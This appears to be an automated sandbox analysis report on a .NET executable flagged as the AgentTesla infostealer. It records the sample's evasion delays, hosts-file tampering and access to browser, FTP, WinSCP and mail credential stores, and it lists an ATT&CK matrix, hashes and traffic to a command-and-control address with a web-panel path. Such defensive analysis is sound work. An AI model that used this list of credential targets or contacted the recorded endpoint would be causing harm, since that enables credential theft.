                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\file.exe TID: 5716Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\Desktop\file.exe TID: 5716Thread sleep count: 106 > 30
                  Source: C:\Users\user\Desktop\file.exe TID: 5716Thread sleep time: -3180000s >= -30000s
                  Source: C:\Users\user\Desktop\file.exe TID: 5716Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\Desktop\file.exe TID: 1556Thread sleep count: 133 > 30
                  Source: C:\Users\user\Desktop\file.exe TID: 1556Thread sleep time: -66500s >= -30000s
                  Source: C:\Users\user\Desktop\file.exe TID: 5716Thread sleep time: -57158s >= -30000s
                  Source: C:\Users\user\Desktop\file.exe TID: 5716Thread sleep time: -56970s >= -30000s
                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\file.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\file.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05992EF6 GetSystemInfo,
                  Source: file.exe, 00000000.00000002.615455546.0000000005710000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                  Source: file.exe, 00000000.00000002.615455546.0000000005710000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                  Source: file.exe, 00000000.00000002.615455546.0000000005710000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                  Source: file.exe, 00000000.00000002.615455546.0000000005710000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                  Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD2DA0 LdrInitializeThunk,
                  Source: C:\Users\user\Desktop\file.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion:

                  barindex
                  Modifies the hosts fileShow sources
                  Source: C:\Users\user\Desktop\file.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: file.exe, 00000000.00000002.611469104.00000000016B0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                  Source: file.exe, 00000000.00000002.611469104.00000000016B0000.00000002.00000001.sdmpBinary or memory string: Progman
                  Source: file.exe, 00000000.00000002.611469104.00000000016B0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
                  Source: file.exe, 00000000.00000002.611469104.00000000016B0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
                  Source: file.exe, 00000000.00000002.611469104.00000000016B0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                  Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Lowering of HIPS / PFW / Operating System Security Settings:

                  barindex
                  Modifies the hosts fileShow sources
                  Source: C:\Users\user\Desktop\file.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                  Stealing of Sensitive Information:

                  barindex
                  Yara detected AgentTeslaShow sources
                  Source: Yara matchFile source: file.exe, type: SAMPLE
                  Source: Yara matchFile source: 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.610250985.00000000008D2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.614009844.00000000031DD000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.228406188.00000000008D2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 5448, type: MEMORY
                  Source: Yara matchFile source: 0.2.file.exe.8d0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.8d0000.0.unpack, type: UNPACKEDPE
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Tries to harvest and steal browser information (history, passwords, etc)Show sources
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Tries to harvest and steal ftp login credentialsShow sources
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                  Tries to steal Mail credentials (via file access)Show sources
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: Yara matchFile source: 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 5448, type: MEMORY

                  Remote Access Functionality:

                  barindex
                  Yara detected AgentTeslaShow sources
                  Source: Yara matchFile source: file.exe, type: SAMPLE
                  Source: Yara matchFile source: 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.610250985.00000000008D2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.614009844.00000000031DD000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.228406188.00000000008D2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 5448, type: MEMORY
                  Source: Yara matchFile source: 0.2.file.exe.8d0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.8d0000.0.unpack, type: UNPACKEDPE

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsWindows Management Instrumentation211Path InterceptionAccess Token Manipulation1Masquerading1OS Credential Dumping2Query Registry1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection1File and Directory Permissions Modification1Input Capture11Security Software Discovery111Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion13Credentials in Registry1Virtualization/Sandbox Evasion13SMB/Windows Admin SharesArchive Collected Data11Automated ExfiltrationApplication Layer Protocol11Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSProcess Discovery2Distributed Component Object ModelData from Local System2Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptAccess Token Manipulation1LSA SecretsSystem Information Discovery115SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDeobfuscate/Decode Files or Information1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobObfuscated Files or Information1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                  Behavior Graph

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  file.exe54%VirustotalBrowse
                  file.exe48%ReversingLabsByteCode-MSIL.Infostealer.DarkStealer
                  file.exe100%AviraTR/Spy.Gen8
                  file.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  0.0.file.exe.8d0000.0.unpack100%AviraHEUR/AGEN.1138205Download File
                  0.2.file.exe.8d0000.0.unpack100%AviraHEUR/AGEN.1138205Download File

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://qL4JAKSuGatRwuRZIZxu.com0%Avira URL Cloudsafe
                  http://64.188.18.2180%Avira URL Cloudsafe
                  https://api.ipify.org%(0%Avira URL Cloudsafe
                  http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                  http://64.188.18.218x&0%Avira URL Cloudsafe
                  https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                  https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                  https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                  http://DynDns.comDynDNS0%URL Reputationsafe
                  http://DynDns.comDynDNS0%URL Reputationsafe
                  http://DynDns.comDynDNS0%URL Reputationsafe
                  http://ymuZnB.com0%Avira URL Cloudsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                  http://64.188.18.218/webpanel-trade/inc/eea5c8636b504d.php0%Avira URL Cloudsafe
                  http://64.188.18.218/webpanel-trade/inc/eea5c8636b504d.php127.0.0.1POST0%Avira URL Cloudsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://64.188.18.218/webpanel-trade/inc/eea5c8636b504d.phpfalse
                  • Avira URL Cloud: safe
                  unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://qL4JAKSuGatRwuRZIZxu.comfile.exe, 00000000.00000002.614009844.00000000031DD000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://64.188.18.218file.exe, 00000000.00000002.614182008.0000000003258000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://api.ipify.org%(file.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  http://127.0.0.1:HTTP/1.1file.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  http://64.188.18.218x&file.exe, 00000000.00000002.614182008.0000000003258000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  https://api.ipify.org%GETMozilla/5.0file.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  low
                  http://DynDns.comDynDNSfile.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://ymuZnB.comfile.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%hafile.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://64.188.18.218/webpanel-trade/inc/eea5c8636b504d.php127.0.0.1POSTfile.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipfile.exefalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  64.188.18.218
                  unknownUnited States
                  8100ASN-QUADRANET-GLOBALUSfalse

                  General Information

                  Joe Sandbox Version:31.0.0 Red Diamond
                  Analysis ID:339128
                  Start date:13.01.2021
                  Start time:15:24:47
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 6m 52s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:file.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:29
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.adwa.spyw.evad.winEXE@1/2@0/1
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 0.6% (good quality ratio 0.2%)
                  • Quality average: 26.7%
                  • Quality standard deviation: 31.5%
                  HCA Information:
                  • Successful, ratio: 99%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .exe
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                  • HTTP Packets have been reduced
                  • TCP Packets have been reduced to 100
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  15:25:45API Interceptor244x Sleep call for process: file.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  64.188.18.218BankSwiftCopyUSD95000.pptGet hashmaliciousBrowse
                  • 64.188.18.218/webpanel-st/inc/6295ae82aa2db6.php

                  Domains

                  No context

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  ASN-QUADRANET-GLOBALUSBankSwiftCopyUSD95000.pptGet hashmaliciousBrowse
                  • 64.188.18.218
                  Paypal Payment Authorization pdf.exeGet hashmaliciousBrowse
                  • 185.244.38.210
                  Scan_00059010189_ ref. 004118379411_ pdf.exeGet hashmaliciousBrowse
                  • 185.244.38.210
                  nh8712Nx5J.xlsGet hashmaliciousBrowse
                  • 185.174.102.105
                  Payment_Confirmation pdf.exeGet hashmaliciousBrowse
                  • 185.244.38.210
                  npp.7.9.2.Installer (1).exeGet hashmaliciousBrowse
                  • 192.169.6.95
                  https://linkprotect.cudasvc.com/url?a=http%3a%2f%2ffindcloud.id%2fwp-includes%2f8JTmzq3FN6z3OBJBdBCfXrdcZl5H7ZxOaOZzfl2H%2f&c=E,1,2CiyC7FGbs3Pvr1yrAWkewOmRL-xyrP42HL37xX4omRyLZqRrqWOt_1RKb6pLtfzxs7zIBTrrVMEwQ8pOUIr2mFuNwrd9eHNrfkptUp83QPlV-CrGIoXMw,,&typo=1Get hashmaliciousBrowse
                  • 173.254.250.226
                  https://mrveggy.com/resgatecarrinho/jcWVa69vj8IDsQRCud8h6RNI9Mz17JqsPPJ0DFnlbXZGyMM2GcZ3/Get hashmaliciousBrowse
                  • 173.254.250.226
                  1I72L29IL3F.docGet hashmaliciousBrowse
                  • 173.254.250.226
                  https://x9sademwnet.gb.net/bnbgfvgrthbg456tr54g6trvecds/?tuk5sx4dsb3=7df34dj4csaGet hashmaliciousBrowse
                  • 104.129.25.9
                  xLH4kwOjXR.exeGet hashmaliciousBrowse
                  • 104.223.94.66
                  utox.exeGet hashmaliciousBrowse
                  • 104.223.122.15
                  QUOTES.exeGet hashmaliciousBrowse
                  • 69.174.99.26
                  file.exeGet hashmaliciousBrowse
                  • 192.161.187.200
                  http://jb092.com/rxlbakzd/goqmmbmi.html?kjmikw5x.3hllrGet hashmaliciousBrowse
                  • 185.174.103.81
                  https://www.trackins.org/sale/cat/sale-c199387IoAL&C_fTkoAvATBo-1LAvvTgoAKL6_.T5.html?_emr=12e4edca-8183-44e0-bccb-e3d6e0eeb447&wfcs=cs2&dcrectxid=d48055ba-93d6-4b3f-80c6-70de3252bde6&_eml=2ec38d65-f3da-4587-bd38-7c1f333c6dc8&source=batch&batchid=04&varid=5&csnid=1eab81b4-e54d-4cc2-8735-a5d571cfe688&brcid=13&sm=1&refid=MKTEML_31000&emlid=1131&maiid=1913Get hashmaliciousBrowse
                  • 173.205.83.250
                  Shipment Document BLINV And Packing List Attached.exeGet hashmaliciousBrowse
                  • 192.161.187.200
                  kWbmxCNnPIYLMvvPIVlMbDKbbQCNjT.exeGet hashmaliciousBrowse
                  • 69.174.99.26
                  Purchase Order.exeGet hashmaliciousBrowse
                  • 104.129.26.162
                  SecuriteInfo.com.Variant.Bulz.265335.2250.exeGet hashmaliciousBrowse
                  • 66.63.162.20

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Roaming\jbvm20a0.pwn\Chrome\Default\Cookies
                  Process:C:\Users\user\Desktop\file.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                  Category:modified
                  Size (bytes):20480
                  Entropy (8bit):0.698304057893793
                  Encrypted:false
                  SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                  MD5:3806E8153A55C1A2DA0B09461A9C882A
                  SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
                  SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                  SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Windows\System32\drivers\etc\hosts
                  Process:C:\Users\user\Desktop\file.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):11
                  Entropy (8bit):2.663532754804255
                  Encrypted:false
                  SSDEEP:3:iLE:iLE
                  MD5:B24D295C1F84ECBFB566103374FB91C5
                  SHA1:6A750D3F8B45C240637332071D34B403FA1FF55A
                  SHA-256:4DC7B65075FBC5B5421551F0CB814CAFDC8CACA5957D393C222EE388B6F405F4
                  SHA-512:9BE279BFA70A859608B50EF5D30BF2345F334E5F433C410EA6A188DCAB395BFF50C95B165177E59A29261464871C11F903A9ECE55B2D900FE49A9F3C49EB88FA
                  Malicious:true
                  Reputation:moderate, very likely benign file
                  Preview: ..127.0.0.1

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Entropy (8bit):6.065431778211596
                  TrID:
                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  • Win32 Executable (generic) a (10002005/4) 49.75%
                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                  • Windows Screen Saver (13104/52) 0.07%
                  • Generic Win/DOS Executable (2004/3) 0.01%
                  File name:file.exe
                  File size:221184
                  MD5:2e1fcfb191508fc51320313d059bd30d
                  SHA1:18254fc83a340ca9562844542425ed7f995bff4a
                  SHA256:5dd60a5a2e5f074435cb438d3e229d1a3c4e4ef35c9c886a356b52aeb83265cd
                  SHA512:3c441d1ce951aa84af2a179372445aa89a10780e51742b3d77679cd831735416040c5dfe52b1644c6b71d885a80add0264310aba9a40fed9679bee69c5f497fd
                  SSDEEP:3072:9+6f5r9AGcfqVIN6uKWqu6XqXn1U/5aB250tS7xKrRkgF973P4tXJVgX3BmlMTSz:lrSN6uKWqu6XKUk80eQrN90tXLGB7kU
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_.................X...........v... ........@.. ....................................@................................

                  File Icon

                  Icon Hash:00828e8e8686b000

                  Static PE Info

                  General

                  Entrypoint:0x4376ee
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Time Stamp:0x5FFE0BD9 [Tue Jan 12 20:51:37 2021 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:v2.0.50727
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                  Entrypoint Preview

                  Instruction
                  jmp dword ptr [00402000h]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x376980x53.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x320.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x3a0000xc.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x20000x356f40x35800False0.446307316005data6.08802155007IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .rsrc0x380000x3200x400False0.333984375data2.64450656248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x3a0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountry
                  RT_VERSION0x380580x2c4data

                  Imports

                  DLLImport
                  mscoree.dll_CorExeMain

                  Version Infos

                  DescriptionData
                  Translation0x0000 0x04b0
                  LegalCopyright
                  Assembly Version0.0.0.0
                  InternalNameEZTKkaWdprxlDwjYETFCzOmRFvHFnuJlnmFKCb.exe
                  FileVersion0.0.0.0
                  ProductVersion0.0.0.0
                  FileDescription
                  OriginalFilenameEZTKkaWdprxlDwjYETFCzOmRFvHFnuJlnmFKCb.exe

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jan 13, 2021 15:25:55.228244066 CET4972380192.168.2.564.188.18.218
                  Jan 13, 2021 15:25:55.349989891 CET804972364.188.18.218192.168.2.5
                  Jan 13, 2021 15:25:55.350079060 CET4972380192.168.2.564.188.18.218
                  Jan 13, 2021 15:25:55.350589037 CET4972380192.168.2.564.188.18.218
                  Jan 13, 2021 15:25:55.474633932 CET804972364.188.18.218192.168.2.5
                  Jan 13, 2021 15:25:55.476967096 CET4972380192.168.2.564.188.18.218
                  Jan 13, 2021 15:25:55.617844105 CET804972364.188.18.218192.168.2.5
                  Jan 13, 2021 15:25:55.666079044 CET4972380192.168.2.564.188.18.218
                  Jan 13, 2021 15:25:55.905258894 CET4972380192.168.2.564.188.18.218
